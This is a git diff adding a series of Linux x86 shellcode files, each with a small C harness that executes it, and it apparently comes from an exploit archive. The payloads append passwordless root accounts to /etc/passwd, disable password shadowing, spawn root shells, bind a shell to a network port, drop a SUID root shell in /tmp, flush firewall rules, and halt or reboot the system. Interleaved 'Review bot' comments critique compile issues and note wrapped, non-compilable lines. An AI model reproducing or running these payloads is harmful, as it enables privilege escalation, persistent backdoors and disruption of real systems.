+"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\xc7\x45\xf0"
+"\x7f\x01\x01\x01\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0"
+"\x43\x8d\x4d\xf4\xcd\x80\x31\xc9\xb0\x3f\xcd\x80\x41\x83\xf9\x03"
+"\x75\xf6\xeb\x18\x5e\x89\x75\x08\x31\xc0\x88\x46\x07\x89\x45\x0c"
+"\xb0\x0b\x89\xf3\x8d\x4d\x08\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff"
+"\xff/bin/sh";
+
+
+main()
+{
+ int (*funct)();
+ funct = (int (*)()) code;
+ printf("%s shellcode\n\tSize = %d\n",NAME,strlen(code));
+ (int)(*funct)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43647.c b/shellcodes/linux_x86/43647.c
new file mode 100644
index 000000000..b2102a496
--- /dev/null
+++ b/shellcodes/linux_x86/43647.c
@@ -0,0 +1,96 @@
+/*
+
+ jmp call_w00w00
+
+w00w00:
+ popl %edi
+ jmp w0w0w
+
+call_w00w00:
+
+ call w00w00
+
+w0w0w:
+
+ # OPEN
+ # ecx=flag (O_RDONLY, O_WRONLY, ...)
+ # O_WRONLY | O_APPEND | O_CREAT = 0x441
+ # edx=file mode
+ # ebx=address of filename
+ # eax=0x05 syscall number
+
+ xorl %ebx,%ebx
+ movb $(file-w0w0w),%bl
+ addl %edi,%ebx
+
+ xorb %al,%al
+ movb %al,11(%ebx)
+
+ xorl %ecx,%ecx
+ movw $0x441,%cx
+
+ xorl %edx,%edx
+ movw $00644,%dx
+
+ xorl %eax,%eax
+ movb $0x5,%al
+
+ int $0x80
+ movl %eax,%ebx # save file descriptor to %ebx (for write)
+
+# WRITE
+# ecx=address of buffer to write
+# edx=number of bytes to write
+# ebx=file descriptor
+# eax=0x04
+
+ xorl %ecx,%ecx
+ movb $(string-w0w0w),%cl
+ addl %edi,%ecx
+
+ xorl %edx,%edx
+ movb $31,%dl
+
+ xorl %eax,%eax
+ movb $0x04,%al
+
+ int $0x80
+
+ xorl %eax,%eax
+ movb $1,%al
+ int $0x80
+
+file:
+.ascii "/etc/passwd"
+endfile:
+.byte 1
+string:
+.ascii "w00w00::0:0:w0w0w!:/:/bin/sh\n"
+
+*/
+
+/*
+ * Source to this is pass.s
+ * This will append a root line to the passwd file (see the source).
+ *
+ * Shok (Matt Conover), shok@dataforce.net
+ */
+
+char shellcode[]=
+ "\xeb\x03\x5f\xeb\x05\xe8\xf8\xff\xff\xff\x31\xdb\xb3\x35\x01\xfb"
+ "\x30\xc0\x88\x43\x0b\x31\xc9\x66\xb9\x41\x04\x31\xd2\x66\xba\xa4"
+ "\x01\x31\xc0\xb0\x05\xcd\x80\x89\xc3\x31\xc9\xb1\x41\x01\xf9\x31"
+ "\xd2\xb2\x1f\x31\xc0\xb0\x04\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x2f"
+ "\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x01\x77\x30\x30\x77\x30"
+ "\x30\x3a\x3a\x30\x3a\x30\x3a\x77\x30\x77\x30\x77\x21\x3a\x2f\x3a"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x0a";
+
+void main()
+{
+
+ int *ret;
+
+ printf("w00w00!\n");
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43648.c b/shellcodes/linux_x86/43648.c
new file mode 100644
index 000000000..840c8d39c
--- /dev/null
+++ b/shellcodes/linux_x86/43648.c
@@ -0,0 +1,32 @@
+#include
+
+const char sc[]= "\x31\xdb" //xor ebx,ebx
+ "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push and pop!
+ "\x99" //cdq
+ "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
+ "\xb0\x0b" //mov al,0bh
+ "\x52" //push edx /Termina la cadena con un 0
+ "\x68\x63\x6f\x6e\x76" //push dword "conv"
+ "\x68\x70\x77\x75\x6e" //push dword "pwun"
+ "\x68\x62\x69\x6e\x2f" //push dword "bin/"
+ "\x68\x73\x72\x2f\x73" //push dword "sr/s"
+ "\x68\x2f\x2f\x2f\x75" //push dword "///u"
+ "\x89\xe3" //mov ebx,esp
+ "\x89\xd1" //mov ecx,edx
+ "\xcd\x80"; //int 80h
+
+void main()
+{
+ printf("\n~ This shellcode disables shadowing on a linux system ~"
+ "\n\n\t ~ Coded by vlan7 ~"
+ "\n\t ~ http://vlan7.blogspot.com ~"
+ "\n\n ~ Date: 4/Jul/2009"
+
+ "\n\tYou'll have the passwords stored in /etc/passwd."
+ "\n\tFor undo purposes use the pwconv command."
+ "\n\t ~ Cheers go to: Wadalbertia"
+ "\n\t ~ Shellcode Size: %d bytes\n\n",
+ sizeof(sc)-1);
+
+ (*(void (*)()) sc)();
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43649.c b/shellcodes/linux_x86/43649.c
new file mode 100644
index 000000000..7666ef2a9
--- /dev/null
+++ b/shellcodes/linux_x86/43649.c
@@ -0,0 +1,28 @@
+#include
+
+const char sc[]= "\x31\xdb" //xor ebx,ebx
+ "\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER tha push/pop
+ "\x99" //cdq
+ "\xcd\x80" //int 80 //setuid(0) shouldn't returns -1 right? ;)
+ "\xb0\x0b" //mov al,0bh
+ "\x52" //push edx /Termina la cadena //bin/sh con un 0
+ "\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69"
+ "\x89\xe3" //mov ebx,esp
+ "\x89\xd1" //mov ecx,edx
+ "\xcd\x80"; //int 80h
+
+int main()
+{
+ printf("\nSMALLEST SETUID & EXECVE GNU/LINUX x86 STABLE SHELLCODE "
+ "WITHOUT NULLS THAT SPAWNS A SHELL"
+ "\n\nCoded by vlan7"
+ "\n\t + vlan7[at]bigfoot.com"
+ "\n\t + http://vlan7.blogspot.com"
+ "\n\n[+] Date: 4/Jul/2009"
+ "\n[+] Thanks to: sch3m4. He initiated the funny game."
+ "\n\n[+] Shellcode Size: %d bytes\n\n",
+ sizeof(sc)-1);
+ (*(void (*)()) sc)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43650.c b/shellcodes/linux_x86/43650.c
new file mode 100644
index 000000000..557d72729
--- /dev/null
+++ b/shellcodes/linux_x86/43650.c
@@ -0,0 +1,17 @@
+#include
+
+const char shellcode[]=
+ "\x40" // inc %eax
+// "\x43" // inc %ebx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Yet conditional (%eax==0) Linux/x86 exit(0) 3 bytes or
+exit(1) 4 bytes"
+ "\n[+] Date: 18/06/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43651.c b/shellcodes/linux_x86/43651.c
new file mode 100644
index 000000000..2f37d8d18
--- /dev/null
+++ b/shellcodes/linux_x86/43651.c
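Review bot: 43650.c is archived with its `printf` string literal broken across two source lines (`... 3 bytes or` / `exit(1) 4 bytes"`), which is not valid C and looks like mail-client wrapping of the original posting rather than what the author published; the same wrapping appears in 43651.c, where the `// mov $0xb,%al (So you'll get segfault ...` comment spills onto two following lines that are then no longer comments, and in 43652.c at the same comment and at the `printf ("... setgid(0) &` / `execve(...)` pair. If the archive's intent is byte-for-byte preservation of the posted file, a one-line note at the top of each such entry, e.g. `/* archived as posted: lines wrapped by the original transport, not compilable as-is */`, would stop readers from treating the wrapped form as the author's source. The `#include` line at the top of these files also carries no header name in the hunk as rendered here, which may be a page-extraction artefact rather than the committed content.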
@@ -0,0 +1,27 @@
+#include
+
+const char shellcode[]=
+ "\x6a\x17" // push $0x17
+ "\x58" // pop %eax
+ "\x31\xdb" // xor %ebx,%ebx
+ "\xcd\x80" // int $0x80
+
+ "\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able
+to do the setuid(0). If you don't want this you can write "\x6a\x0b\x58"
+instead of "\xb0\x0b", but the shellcode will be 1 byte longer
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Linux/x86 setuid(0) & execve(/bin/sh,0)"
+ "\n[+] Date: 23/06/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43652.c b/shellcodes/linux_x86/43652.c
new file mode 100644
index 000000000..57bd0e561
--- /dev/null
+++ b/shellcodes/linux_x86/43652.c
@@ -0,0 +1,34 @@
+#include
+
+const char shellcode[]=
+ "\x6a\x17" // push $0x17
+ "\x58" // pop %eax
+ "\x31\xdb" // xor %ebx,%ebx
+ "\xcd\x80" // int $0x80
+
+ "\xb0\x2e" // mov $0x2e,%al
+ "\xcd\x80" // int $0x80
+
+ "\xb0\x0b" // mov $0xb,%al (So you'll get segfault if it's not able to
+do the setuid(0). If you don't want this you can write "\x6a\x0b\x58"
+instead of "\xb0\x0b", but the shellcode will be 1 byte longer
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Linux/x86 setuid(0), setgid(0) &
+execve(/bin/sh,[/bin/sh,NULL])"
+ "\n[+] Date: 23/06/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43653.c b/shellcodes/linux_x86/43653.c
new file mode 100644
index 000000000..14ebb0a5e
--- /dev/null
+++ b/shellcodes/linux_x86/43653.c
@@ -0,0 +1,28 @@
+#include
+
+const char shellcode[]=
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x64\x6f\x77\x6e" // push $0x6e776f64
+ "\x68\x73\x68\x75\x74" // push $0x74756873
+ "\x68\x69\x6e\x2f\x2f" // push $0x2f2f6e69
+ "\x68\x2f\x2f\x73\x62" // push $0x62732f2f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x6a\x30" // push $0x30
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Linux/x86 execve(/sbin/shutdown,/sbin/shutdown 0)"
+ "\n[+] Date: 11/07/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43654.c b/shellcodes/linux_x86/43654.c
new file mode 100644
index 000000000..33473cdf6
--- /dev/null
+++ b/shellcodes/linux_x86/43654.c
@@ -0,0 +1,25 @@
+#include
+
+const char shellcode[]=
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x68\x62\x6f\x6f\x74" // push $0x746f6f62
+ "\x68\x6e\x2f\x72\x65" // push $0x65722f6e
+ "\x68\x2f\x73\x62\x69" // push $0x6962732f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Linux/x86 execve(/sbin/reboot,/sbin/reboot)"
+ "\n[+] Date: 11/07/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43655.c b/shellcodes/linux_x86/43655.c
new file mode 100644
index 000000000..e332eeab3
--- /dev/null
+++ b/shellcodes/linux_x86/43655.c
@@ -0,0 +1,25 @@
+#include
+
+const char shellcode[]=
+ "\x6a\x0b" // push $0xb
+ "\x58" // pop %eax
+ "\x99" // cltd
+ "\x52" // push %edx
+ "\x66\x68\x6c\x74" // pushw $0x746c
+ "\x68\x6e\x2f\x68\x61" // push $0x61682f6e
+ "\x68\x2f\x73\x62\x69" // push $0x6962732f
+ "\x89\xe3" // mov %esp,%ebx
+ "\x52" // push %edx
+ "\x53" // push %ebx
+ "\x89\xe1" // mov %esp,%ecx
+ "\xcd\x80"; // int $0x80
+
+int main()
+{
+ printf ("\n[+] Linux/x86 execve(/sbin/halt,/sbin/halt)"
+ "\n[+] Date: 11/07/2009"
+ "\n[+] Author: TheWorm"
+ "\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(shellcode)-1);
+ (*(void (*)()) shellcode)();
+ return 0;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43656.c b/shellcodes/linux_x86/43656.c
new file mode 100644
index 000000000..b31ea0bc7
--- /dev/null
+++ b/shellcodes/linux_x86/43656.c
@@ -0,0 +1,66 @@
+/*
+ * (linux/x86) portbind /bin/sh (port 64713)
+ * 83 bytes
+ *
+ * http://www.gonullyourself.org
+ * sToRm
+ */
+
+char shellcode[] =
+ // <_start>:
+"\x6a\x66" // push $0x66
+"\x58" // pop %eax
+"\x31\xdb" // xor %ebx,%ebx
+"\x53" // push %ebx
+"\x43" // inc %ebx
+"\x53" // push %ebx
+"\x6a\x02" // push $0x2
+"\x89\xe1" // mov %esp,%ecx
+"\xcd\x80" // int $0x80
+"\x31\xd2" // xor %edx,%edx
+"\x52" // push %edx
+"\x68\xff\x02\xfc\xc9" // push $0xc9fc02ff
+"\x89\xe1" // mov %esp,%ecx
+"\x6a\x10" // push $0x10
+"\x51" // push %ecx
+"\x50" // push %eax
+"\x89\xe1" // mov %esp,%ecx
+"\x89\xc6" // mov %eax,%esi
+"\x43" // inc %ebx
+"\xb0\x66" // mov $0x66,%al
+"\xcd\x80" // int $0x80
+"\xb0\x66" // mov $0x66,%al
+"\x43" // inc %ebx
+"\x43" // inc %ebx
+"\xcd\x80" // int $0x80
+"\x50" // push %eax
+"\x56" // push %esi
+"\x89\xe1" // mov %esp,%ecx
+"\x43" // inc %ebx
+"\xb0\x66" // mov $0x66,%al
+"\xcd\x80" // int $0x80
+"\x93" // xchg %eax,%ebx
+"\x6a\x03" // push $0x3
+"\x59" // pop %ecx
+ // :
+"\x49" // dec %ecx
+"\x6a\x3f" // push $0x3f
+"\x58" // pop %eax
+"\xcd\x80" // int $0x80
+"\x75\xf8" // jne
+"\xf7\xe1" // mul %ecx
+"\x51" // push %ecx
+"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+"\x89\xe3" // mov %esp,%ebx
+"\xb0\x0b" // mov $0xb,%al
+"\xcd\x80" // int $0x80
+;
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43657.c b/shellcodes/linux_x86/43657.c
new file mode 100644
index 000000000..5f8d1e7f5
--- /dev/null
+++ b/shellcodes/linux_x86/43657.c
@@ -0,0 +1,35 @@
+/*
+ * (linux/x86) setuid(0) & execve("/bin/sh",0,0)
+ * 28 bytes
+ *
+ * http://www.gonullyourself.org
+ * sToRm
+ *
+ * I made this, because http://www.milw0rm.com/shellcode/7115 felt the need
+ * to express his "superior" 28-byte shellcode in all caps. I wasn't able
+ * to beat his code, but it's no longer special.
+ */
+
+char shellcode[] =
+ // <_start>:
+ "\x31\xdb" // xor %ebx,%ebx
+ "\x6a\x17" // push $0x17
+ "\x58" // pop %eax
+ "\xcd\x80" // int $0x80
+ "\xf7\xe3" // mul %ebx
+ "\xb0\x0b" // mov $0xb,%al
+ "\x31\xc9" // xor %ecx,%ecx
+ "\x51" // push %ecx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xcd\x80" // int $0x80
+;
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43658.c b/shellcodes/linux_x86/43658.c
new file mode 100644
index 000000000..02b79e85d
--- /dev/null
+++ b/shellcodes/linux_x86/43658.c
@@ -0,0 +1,27 @@
+/*
+ * (linux/x86) execve("/bin/sh",0,0)
+ * 21 bytes
+ *
+ * http://www.gonullyourself.org
+ * sToRm
+ */
+
+char shellcode[] =
+ // <_start>
+ "\x31\xc9" // xor %ecx,%ecx
+ "\xf7\xe1" // mul %ecx
+ "\x51" // push %ecx
+ "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
+ "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
+ "\x89\xe3" // mov %esp,%ebx
+ "\xb0\x0b" // mov $0xb,%al
+ "\xcd\x80" // int $0x80
+;
+
+int main() {
+
+ int (*f)() = (int(*)())shellcode;
+ printf("Length: %u\n", strlen(shellcode));
+ f();
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43660.c b/shellcodes/linux_x86/43660.c
new file mode 100644
index 000000000..8f9b687fd
--- /dev/null
+++ b/shellcodes/linux_x86/43660.c
@@ -0,0 +1,67 @@
+/*
+ linux/x86 (shamelessly ripped from one of my unpublished exploits)
+*/
+/*
+ fork()'s, does setreuid(0, 0); then execve()'s:
+ /bin/sh -c "cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh"
+
+ hence dropping a SUID root shell in /tmp.
+*/
+
+char shellc[] =
+/* Shellcode to drop a SUID root shell in /tmp/sh.
+ Forgive the Intel syntax in the commenting, bored with AT&T syntax..
+ */
+
+/* main: if (fork()) goto exeunt; else goto carryon; */
+"\x29\xc0" /* sub ax, ax */
+"\xb0\x02" /* mov al, 2 */
+"\xcd\x80" /* int 0x80 */
+"\x85\xc0" /* test ax, ax */
+"\x75\x02" /* jnz exeunt */
+"\xeb\x05" /* jmp carryon */
+
+/* exeunt: exit(x); */
+"\x29\xc0" /* sub ax, ax */
+"\x40" /* inc ax */
+"\xcd\x80" /* int 0x80 */
+
+/* carryon: setreuid(0, 0); goto callz; */
+"\x29\xc0" /* sub ax, ax */
+"\x29\xdb" /* sub bx, bx */
+"\x29\xc9" /* sub cx, cx */
+"\xb0\x46" /* mov al, 0x46 */
+"\xcd\x80" /* int 0x80 */
+"\xeb\x2a" /* jmp callz */
+
+/* start: execve() */
+"\x5e" /* pop si */
+"\x89\x76\x32" /* mov [bp+0x32], si */
+"\x8d\x5e\x08" /* lea bx, [bp+0x08] */
+"\x89\x5e\x36" /* mov [bp+0x36], bx */
+"\x8d\x5e\x0b" /* lea bx, [bp+0x0b] */
+"\x89\x5e\x3a" /* mov [bp+0x3a], bx */
+"\x29\xc0" /* sub ax, ax */
+"\x88\x46\x07" /* mov [bp+0x07], al */
+"\x88\x46\x0a" /* mov [bp+0x0a], al */
+"\x88\x46\x31" /* mov [bp+0x31], al */
+"\x89\x46\x3e" /* mov [bp+0x3e], ax */
+"\x87\xf3" /* xchg si, bx */
+"\xb0\x0b" /* mov al, 0x0b */
+"\x8d\x4b\x32" /* lea cx, [bp+di+0x32] */
+"\x8d\x53\x3e" /* lea dx, [bp+di+0x3e] */
+"\xcd\x80" /* int 0x80 */
+
+/* callz: call start */
+"\xe8\xd1\xff\xff\xff" /* call start */
+
+/* data - command to execve() */
+"\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x63\x20\x63\x70\x20\x2f\x62\x69\x6e\x2f"
+"\x73\x68\x20\x2f\x74\x6d\x70\x2f\x73\x68\x3b\x20\x63\x68\x6d\x6f\x64\x20\x34"
+"\x37\x35\x35\x20\x2f\x74\x6d\x70\x2f\x73\x68";
+
+/** test out the shellcode **/
+main ()
+{
+ void (*sc)() = (void *)shellc; sc();
+}
\ No newline at end of file
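Review bot: `main ()` at the end of the hunk has no return type and relies on implicit `int`, which C99 removed; write `int main(void)`. `void (*sc)() = (void *)shellc;` converts an object pointer to a function pointer through `void *`, which is not portable C and draws a pedantic warning, so it deserves a comment marking it intentional. The per-byte comments also use 16-bit register names and 16-bit addressing forms (`sub ax, ax`, `pop si`, `mov [bp+0x32], si`) while the bytes carry no operand- or address-size prefix and so encode 32-bit operations on the stated linux/x86 target; that will mislead anyone cross-checking the listing, and the comments should name `eax`, `esi` and the `esi`-relative forms the bytes actually encode.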
diff --git a/shellcodes/linux_x86/43661.c b/shellcodes/linux_x86/43661.c new file mode 100644 index 000000000..24e298a38 --- /dev/null +++ b/shellcodes/linux_x86/43661.c 
@@ -0,0 +1,52 @@ + /* + * Audio (knock knock knock) via /dev/dsp + setreuid(0,0) + execve shellcode. +(Linux x86) + * Author: Cody Tubbs (loophole of hhp). + * www.hhp-programming.net / pigspigs@yahoo.com + * 12/20/2000. + * + * F.U. to ph1x(ry4n). -From me and dxmd... + * [If I ripped this, show me the source... or better yet + * go barrow a shovel so you can dig up deeper shit.] + */ + +unsigned char hhpcode[] = +"\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66" +"\xb9\x1c\x02\x80\x36\x03\x46\xe2\xfa\xea\xb8\x03\x03\x03\x2c\x61" +"\x6a\x6d\x2c\x70\x6b\x03\x7d\x03\x93\x93\x93\x93\x93\x93\x93\x93" +"\x93\x93\x93\x93\x93\x93\x93\x93\x93\x7f\x79\x75\x76\x76\x77\x72" +"\x6e\x69\x68\x6d\x70\x76\x76\x72\x6e\x69\x64\x65\x60\x63\x5e\x58" +"\x58\x5e\x5d\x5d\x5e\x5c\x61\x64\x6e\x70\x78\xa5\xaf\xb1\xb5\xbf" +"\xbc\xc0\xc6\xc6\xc1\xc2\xbd\xbe\xb9\xbb\xb6\xac\xaa\xa0\x6d\x6f" +"\x66\x6a\x69\x64\x55\x26\x33\x4d\x54\x5d\x43\x38\x35\x46\x40\x63" +"\x60\x61\x55\x48\x49\x4d\x5d\x66\x6e\x6a\x64\x63\x59\x54\x63\x69" +"\x6f\x70\x7a\x7b\x77\x7b\x79\x75\x71\x6d\x72\x72\x70\x71\x72\x6d" +"\x72\x70\x70\x70\x79\x76\x6c\x6d\x6f\x6e\x68\x70\x75\x6e\x65\x65" +"\x69\x68\x72\x75\x7d\x7f\x7e\x7d\x7f\x79\x78\x78\x7e\x79\x7e\x7d" +"\x7f\x74\x75\x77\x70\x75\x79\x7f\x78\x7a\x75\x71\x73\x72\x09\x03" +"\x2c\x67\x66\x75\x2c\x67\x70\x73\x03\x82\xef\x64\x28\x03\x03\x8a" +"\xf5\x56\x8a\xe6\x80\xef\x1f\x54\x55\x50\xeb\x03\x03\x03\x03\x58" +"\x82\xc0\xb9\x12\x03\x03\xc4\x46\xfb\x03\x03\x03\x03\xc4\x46\xff" +"\x03\x03\x03\x03\x8e\x80\x76\xee\xfc\xfc\x8a\x46\xfb\x8e\xb8\x7e" +"\xee\xfc\xfc\x8e\x90\x93\xee\xfc\xfc\x8a\x56\xeb\x8e\x88\x24\xed" +"\xfc\xfc\x8a\xcd\xbb\x06\x03\x03\x03\xba\x02\x03\x03\x03\xb9\x83" +"\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\x46\xf7\xbb\x2a\x03\x03\x03" +"\x88\x76\xf7\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03" +"\x88\x76\xe7\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a\xf0\xce\x83" +"\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3\x03\x03\x03" 
+"\x03\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9\x02\x03\x03\x03" +"\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54\x01\x03\x03\x7d" +"\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03\x03\x03\x50\x8a" +"\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce\x83\xc4\x46\xf3" +"\x03\x03\x03\x03\x93\xbb\x07\x03\x03\x03\x88\x76\xe7\x8a\xfa\xb9" +"\x02\x03\x03\x03\x50\x8a\xf0\xce\x83\xfc\x46\xf3\x82\x7e\xf3\x54" +"\x01\x03\x03\x7d\xe3\xbb\x07\x03\x03\x03\x88\x4e\xeb\xb9\x95\x03" +"\x03\x03\x50\x8a\xf0\xce\x83\xbb\x07\x03\x03\x03\x50\x8a\xf0\xce" +"\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03" +"\x88\x76\xf7\x50\x8a\xf0\xce\x83\xbb\x45\x03\x03\x03\x32\xf5\x32" +"\xca\x50\x8a\xf0\xce\x83\x8e\x7e\xfb\xbb\x08\x03\x03\x03\x88\x76" +"\xfb\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x32\xc3\x8e\x66\xdb\x58" +"\x5d\x5c\xca\xc0\x93\x69"; + +typedef void (*F)(); +main(){F a;a=(F)(&hhpcode);a();} \ No newline at end of file diff --git a/shellcodes/linux_x86/43662.c b/shellcodes/linux_x86/43662.c new file mode 100644 index 000000000..ff4f69505 --- /dev/null +++ b/shellcodes/linux_x86/43662.c 
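Review bot: The harness on the last line, `main(){F a;a=(F)(&hhpcode);a();}`, uses implicit-int `main` and crams three statements onto one line; it should read `int main(void) { F a = (F)hhpcode; a(); return 0; }` (`&hhpcode` is a pointer to the whole array, which only the cast papers over). The string literal carries no annotation at all, unlike the neighbouring files, so nothing in the hunk lets a reviewer check the header's description without disassembling; a short comment naming the syscalls in order would help.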
@@ -0,0 +1,39 @@
+Linux x86 shellcode that uses execve and echo >> to create a passwordless
+root account.
+
+
+Author: zillion
+Email : zillion@safemode.org
+Homepage: safemode.org
+File: w000t-shell.c
+
+
+
+/*
+ * This shellcode will add a passwordless local root account 'w000t'
+ * Written by zillion@safemode.org
+ *
+ * Why so big ? it uses execve ;-)
+ */
+
+char shellcode[]=
+ "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
+ "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
+ "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
+ "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
+ "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
+ "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
+ "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
+ "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
+ "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
+ "\x44\x44";
+
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43663.c b/shellcodes/linux_x86/43663.c
new file mode 100644
index 000000000..68986c24c
--- /dev/null
+++ b/shellcodes/linux_x86/43663.c
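Review bot: The prose header (`Linux x86 shellcode that uses execve and echo >> ...` through `File: w000t-shell.c`) sits outside any comment, so the committed file is not a C translation unit and will not compile; wrap it in `/* ... */`. 43663.c and 43664.c in the next hunk have the same unwrapped header. The harness `ret = (int *)&ret + 2; (*ret) = (int)shellcode;` overwrites what it assumes is `main`'s saved return address, which depends on a frame layout no current compiler guarantees, and the `(int)` cast truncates the pointer on 64-bit targets; the header comment should state the 32-bit, specific-compiler assumption, or the harness should use the direct function-pointer call the other files in this commit use.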
@@ -0,0 +1,32 @@
+Author: zillion
+Email: zillion@safemode.org
+Homepage: http://www.safemode.org
+
+
+Linux x86 shell code that does an execve of /sbin/ipchains -F
+
+
+File name: flush-ipchains-shellcode.c
+
+
+/*
+ * This shellcode will do /sbin/ipchains -F
+ * Written by zillion@safemode.org
+ *
+ */
+
+char shellcode[]=
+ "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
+ "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+ "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
+ "\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x38\x2d\x46\x32\x33\x34"
+ "\x35\x36\x37\x38\x39\x61\x62\x63\x64\x65";
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
